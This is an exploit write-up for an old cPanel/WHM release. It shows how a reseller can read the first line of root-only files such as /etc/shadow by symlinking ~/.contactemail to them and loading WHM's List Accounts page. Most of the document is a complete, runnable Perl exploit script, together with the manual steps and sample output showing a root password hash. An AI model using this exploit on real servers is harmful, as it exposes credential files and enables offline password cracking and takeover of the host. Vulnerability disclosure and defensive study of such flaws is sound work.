cPanel 11.15.0-RELEASE_17853 - view first line of any file



DESCRIPTION


Resellers could view the first line of any file on the server, including root-only files such as /etc/shadow. This was done by renaming or removing ~/.contactemail and then creating ~/.contactemail as a symlink to the target file. When the reseller logged into WHM and clicked "List Accounts", the first line of the target file was displayed in the Contact Email field of their account.


Step 1:

[user@host ~]$ ln -s /etc/shadow /home/user/.contactemail


Step 2 (sent to WHM on port 2086, authenticated as the reseller with HTTP Basic auth):

GET /scripts2/listaccts?viewall=1 HTTP/1.0



IMPACT


Resellers could obtain root's password hash from the first line of /etc/shadow (or credentials from /etc/exim/authtab) and crack it offline, since WHM reads the symlinked file with enough privilege to open root-only files. Only the first line of each target is disclosed per request.


[user@host ~]$ ./11.15.0-RELEASE_17853-view_first_line_of_any_file.pl
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::


#!/usr/bin/perl

####################################################
#
# 11.15.0-RELEASE_17853
#
# View the first line of a file, such as /etc/shadow
# Works via /home/user/.contactemail
#
####################################################

use strict;
use warnings;
use MIME::Base64;
use IO::Socket::INET;

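# Reseller WHM credentials (HTTP Basic auth against port 2086).
# Fill these in before running; WHM rejects the request otherwise and
# the script would print nothing.
my $username = '';
my $password = '';

# Optional overrides: the file to read and the text its first line is
# expected to start with.  The listaccts page renders the symlinked
# contact email as "mailto:<first line>", so a prefix is needed to pick
# that line out of the response.  Defaults reproduce the /etc/shadow case.
my $target = defined $ARGV[0] ? $ARGV[0] : '/etc/shadow';
my $prefix = defined $ARGV[1] ? $ARGV[1] : 'root';

die "Set \$username and \$password to the reseller's WHM credentials\n"
    if $username eq '' || $password eq '';

# encode_base64 appends a newline by default, which would break the
# Authorization header; pass '' as the line terminator.
my $creds = encode_base64( "$username:$password", '' );

# Resolve the home directory from the passwd entry rather than trusting
# $ENV{USER}; fall back to the original /home/<user> guess.
my $home = ( getpwuid($<) )[7];
$home = "/home/$ENV{'USER'}" unless defined $home && length $home;

my $contactemail    = "$home/.contactemail";
my $contactemailbak = $contactemail . 'bak';

my $had_original = 0;    # a pre-existing .contactemail was moved aside
my $link_planted = 0;    # our symlink is in place and must be removed

# Undo the symlink and restore the original file on every exit path,
# including die(): leaving ~/.contactemail -> $target behind would keep
# disclosing the file's first line on every later "List Accounts" view.
END {
    if ( $link_planted && -l $contactemail ) {
        unlink $contactemail
            or warn "unlink $contactemail: $!\n";
    }
    if ( $had_original && -e $contactemailbak ) {
        rename $contactemailbak, $contactemail
            or warn "restore $contactemailbak -> $contactemail: $!\n";
    }
}

# Move any existing .contactemail out of the way.  -l also catches a
# dangling symlink left by an earlier aborted run, which -e alone would
# miss and which would make the symlink() below fail with EEXIST.
if ( -l $contactemail || -e $contactemail ) {
    rename $contactemail, $contactemailbak
        or die "rename $contactemail -> $contactemailbak: $!\n";
    $had_original = 1;
}

symlink $target, $contactemail
    or die "symlink $target -> $contactemail: $!\n";
$link_planted = 1;

my $request = "GET /scripts2/listaccts?viewall=1 HTTP/1.0\r\n";
$request   .= "Authorization: Basic $creds\r\n\r\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => '127.0.0.1',
    PeerPort => '2086',
    Proto    => 'tcp',
    Timeout  => '3',
) or die "Unable to connect to localhost on port 2086\n";

print {$sock} $request or die "write to WHM: $!\n";

# Slurp the whole response; a single fixed-size read() could stop short
# of the account list on a server with many accounts.
my $buffer = do { local $/; <$sock> };
close $sock;
$buffer = '' unless defined $buffer;

# The reseller's own account row carries the symlinked file's first line
# as <a href="mailto:<line>">; strip everything around it.
my $found = 0;
for my $line ( split /\n/, $buffer ) {
    next unless $line =~ /mailto:\Q$prefix\E/;
    $line =~ s/.*mailto://g;
    $line =~ s/\".*//g;
    print "$line\n";
    $found = 1;
}

warn "No 'mailto:$prefix' in the WHM response; check the credentials, ",
     "the port, or whether this build is still vulnerable.\n"
    unless $found;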